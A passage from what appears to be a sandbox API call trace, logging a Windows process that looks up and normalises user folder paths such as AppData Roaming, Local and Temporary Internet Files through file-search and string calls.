psz="appdata", len=0x7 | out: pbstr=0x33200ec*="appdata") returned 1 [0077.497] SysReAllocStringLen (in: pbstr=0x33200f8*=0x0, psz="local", len=0x5 | out: pbstr=0x33200f8*="local") returned 1 [0077.497] SysReAllocStringLen (in: pbstr=0x3320104*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x3320104*="microsoft") returned 1 [0077.498] SysReAllocStringLen (in: pbstr=0x3320134*=0x0, psz="windows", len=0x7 | out: pbstr=0x3320134*="windows") returned 1 [0077.498] SysReAllocStringLen (in: pbstr=0x3320140*=0x0, psz="temporary internet files", len=0x18 | out: pbstr=0x3320140*="temporary internet files") returned 1 [0077.498] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.498] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdcc*="c:\\") returned 1 [0077.498] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.498] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe414c8 [0077.498] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.498] GetLastError () returned 0x12 [0077.498] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.499] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.499] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdcc*="c:\\Users\\") returned 1 [0077.499] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.499] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe414c8 [0077.499] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.499] GetLastError () returned 0x12 [0077.499] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.499] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.499] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.499] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0077.499] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0xe414c8 [0077.500] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0077.500] GetLastError () returned 0x12 [0077.500] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.500] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0077.500] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0xe414c8 [0077.500] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0077.500] GetLastError () returned 0x12 [0077.500] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.501] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0xe414c8 [0077.501] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0077.501] GetLastError () returned 0x12 [0077.501] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.502] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0xe414c8 [0077.502] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0077.502] GetLastError () returned 0x12 [0077.502] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.502] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\temporary internet files" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0xe414c8 [0077.502] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0077.502] GetLastError () returned 0x12 [0077.502] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.504] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0077.504] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0077.504] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdd0*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0077.504] SysReAllocStringLen (in: pbstr=0x3320084*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x3320084*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0077.504] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0077.504] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchLength=0x22 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming") returned 0x22 [0077.504] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming", len=0x22 | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\appdata\\roaming") returned 1 [0077.504] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33200ec*="appdata") returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x33200f8*=0x0, psz="roaming", len=0x7 | out: pbstr=0x33200f8*="roaming") returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdc0*="c:\\") returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.505] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe414c8 [0077.505] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.505] GetLastError () returned 0x12 [0077.505] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.505] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.506] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdc0*="c:\\Users\\") returned 1 [0077.506] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.506] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe414c8 [0077.506] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.506] GetLastError () returned 0x12 [0077.506] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.506] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.506] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.506] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0077.507] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0xe414c8 [0077.507] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0077.507] GetLastError () returned 0x12 [0077.507] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.507] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0077.507] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0077.507] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0077.507] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xe414c8 [0077.507] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0077.507] GetLastError () returned 0x12 [0077.507] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.508] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0077.508] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0077.508] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0077.509] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0077.509] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc4*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0077.509] SysReAllocStringLen (in: pbstr=0x3320088*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x3320088*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0077.509] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0077.512] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local", cchLength=0x20 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local") returned 0x20 [0077.512] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local", len=0x20 | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\appdata\\local") returned 1 [0077.512] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.513] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.513] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.513] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33200ec*="appdata") returned 1 [0077.513] SysReAllocStringLen (in: pbstr=0x33200f8*=0x0, psz="local", len=0x5 | out: pbstr=0x33200f8*="local") returned 1 [0077.513] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.514] SysReAllocStringLen (in: pbstr=0x28fdb4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdb4*="c:\\") returned 1 [0077.514] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.514] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe414c8 [0077.514] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.514] GetLastError () returned 0x12 [0077.514] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.514] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.514] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdb4*="c:\\Users\\") returned 1 [0077.514] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.514] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe414c8 [0077.515] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, 